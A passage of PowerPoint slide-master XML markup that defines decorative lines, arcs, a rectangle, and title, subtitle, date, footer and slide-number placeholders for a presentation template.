              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="384976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1026"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6858000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5760" cy="4320"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="Group 1027"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="5760" cy="4320"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="5760" cy="4320"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="15" name="Rectangle 1028"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm>
                <a:off x="2112" y="0"/>
                <a:ext cx="3648" cy="96"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="folHlink"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="4" name="Group 1029"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="5760" cy="4320"/>
                <a:chOff x="0" y="0"/>
                <a:chExt cx="5760" cy="4320"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="18" name="Line 1030"/>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9" name="Line 1031"/>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20" name="Line 1032"/>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21" name="Line 1033"/>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22" name="Line 1034"/>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23" name="Line 1035"/>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24" name="Line 1036"/>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25" name="Line 1037"/>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26" name="Line 1038"/>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27" name="Line 1039"/>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28" name="Line 1040"/>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29" name="Line 1041"/>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30" name="Line 1042"/>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31" name="Line 1043"/>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32" name="Line 1044"/>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33" name="Line 1045"/>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34" name="Line 1046"/>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35" name="Line 1047"/>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36" name="Line 1048"/>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37" name="Line 1049"/>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38" name="Line 1050"/>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39" name="Line 1051"/>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40" name="Line 1052"/>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41" name="Line 1053"/>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42" name="Line 1054"/>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43" name="Line 1055"/>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44" name="Line 1056"/>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45" name="Line 1057"/>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46" name="Line 1058"/>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47" name="Line 1059"/>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48" name="Line 1060"/>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49" name="Line 1061"/>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50" name="Line 1062"/>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51" name="Line 1063"/>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52" name="Line 1064"/>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53" name="Line 1065"/>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54" name="Line 1066"/>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55" name="Line 1067"/>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56" name="Line 1068"/>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57" name="Line 1069"/>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58" name="Line 1070"/>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59" name="Line 1071"/>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60" name="Line 1072"/>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61" name="Line 1073"/>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62" name="Line 1074"/>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63" name="Line 1075"/>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64" name="Line 1076"/>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65" name="Line 1077"/>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66" name="Line 1078"/>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67" name="Line 1079"/>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68" name="Line 1080"/>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grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17" name="Line 1081"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm>
                <a:off x="5568" y="0"/>
                <a:ext cx="0" cy="1488"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="Group 1082"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3" y="559"/>
              <a:ext cx="4192" cy="1796"/>
              <a:chOff x="3" y="559"/>
              <a:chExt cx="4192" cy="1796"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Line 1083"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm>
                <a:off x="506" y="559"/>
                <a:ext cx="0" cy="1796"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Line 1084"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="3" y="1924"/>
                <a:ext cx="3211" cy="1"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Line 1085"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="384" y="938"/>
                <a:ext cx="3811" cy="1"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="Arc 1086"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm rot="16200000" flipH="1">
                <a:off x="426" y="860"/>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defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 1087"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1480" y="1952"/>
              <a:ext cx="3808" cy="1812"/>
              <a:chOff x="1480" y="1952"/>
              <a:chExt cx="3808" cy="1812"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Line 1088"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm flipV="1">
                <a:off x="1480" y="3442"/>
                <a:ext cx="3808" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="Line 1089"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm flipH="1">
                <a:off x="5172" y="1952"/>
                <a:ext cx="0" cy="1812"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="Arc 1090"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm rot="5400000">
                <a:off x="5097" y="3347"/>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defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1069123" name="Rectangle 1091"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1752600"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1069124" name="Rectangle 1092" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="3309938"/>
            <a:ext cx="6400800" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Rectangle 1093"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="62484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400">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Rectangle 1094"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="6248400"/>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1400">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Rectangle 1095"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7162800" y="6400800"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{0A84A61C-B044-46DD-BA8E-6378D8153B65}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>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8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{0F6EDF5B-CE31-472F-82A7-D6119DC81219}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>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8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{DD340A0A-AB8B-40F5-9B87-6FB4D21BE0A0}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</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524000"/>
            <a:ext cx="39243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14900" y="1524000"/>
            <a:ext cx="39243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8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{45C733D8-7256-45A1-8756-987371482E55}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>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8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00DE8B12-F71D-49CD-AA27-C1CCD28323CE}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>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8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{671857E4-A199-452A-8860-595529EBB88A}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>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1B90E5FC-6F73-4FB4-A697-0B9762ADA319}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>‹#›</a:t>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68"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7ACA9177-2F1F-44E7-84DA-ADFD13715FFB}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>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8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E7238E29-5E59-498F-9410-860CFCD70F87}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>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8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{BA293FC6-C5B9-454A-8A82-ACC5C683CDE7}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>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8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7C521416-25BA-4029-B821-8334EC92D5A9}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>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304800"/>
            <a:ext cx="2057400" cy="6477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304800"/>
            <a:ext cx="6019800" cy="6477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8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{1AECC46B-A6AA-49DD-8BB5-D6F6A3C0EEEB}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>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1026"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6858000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5760" cy="4320"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="Group 1027"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="5760" cy="4320"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="5760" cy="4320"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="15" name="Rectangle 1028"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm>
                <a:off x="2112" y="0"/>
                <a:ext cx="3648" cy="96"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="folHlink"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="4" name="Group 1029"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="5760" cy="4320"/>
                <a:chOff x="0" y="0"/>
                <a:chExt cx="5760" cy="4320"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="18" name="Line 1030"/>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9" name="Line 1031"/>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20" name="Line 1032"/>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21" name="Line 1033"/>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22" name="Line 1034"/>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23" name="Line 1035"/>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24" name="Line 1036"/>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25" name="Line 1037"/>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26" name="Line 1038"/>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27" name="Line 1039"/>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28" name="Line 1040"/>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29" name="Line 1041"/>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30" name="Line 1042"/>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31" name="Line 1043"/>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32" name="Line 1044"/>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33" name="Line 1045"/>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34" name="Line 1046"/>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35" name="Line 1047"/>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36" name="Line 1048"/>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37" name="Line 1049"/>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38" name="Line 1050"/>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39" name="Line 1051"/>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40" name="Line 1052"/>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41" name="Line 1053"/>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42" name="Line 1054"/>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43" name="Line 1055"/>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44" name="Line 1056"/>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45" name="Line 1057"/>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46" name="Line 1058"/>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47" name="Line 1059"/>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48" name="Line 1060"/>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49" name="Line 1061"/>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50" name="Line 1062"/>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51" name="Line 1063"/>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52" name="Line 1064"/>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53" name="Line 1065"/>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54" name="Line 1066"/>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55" name="Line 1067"/>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56" name="Line 1068"/>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57" name="Line 1069"/>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58" name="Line 1070"/>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59" name="Line 1071"/>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60" name="Line 1072"/>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61" name="Line 1073"/>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62" name="Line 1074"/>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63" name="Line 1075"/>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64" name="Line 1076"/>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65" name="Line 1077"/>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66" name="Line 1078"/>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67" name="Line 1079"/>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68" name="Line 1080"/>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grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17" name="Line 1081"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm>
                <a:off x="5568" y="0"/>
                <a:ext cx="0" cy="1488"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="Group 1082"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
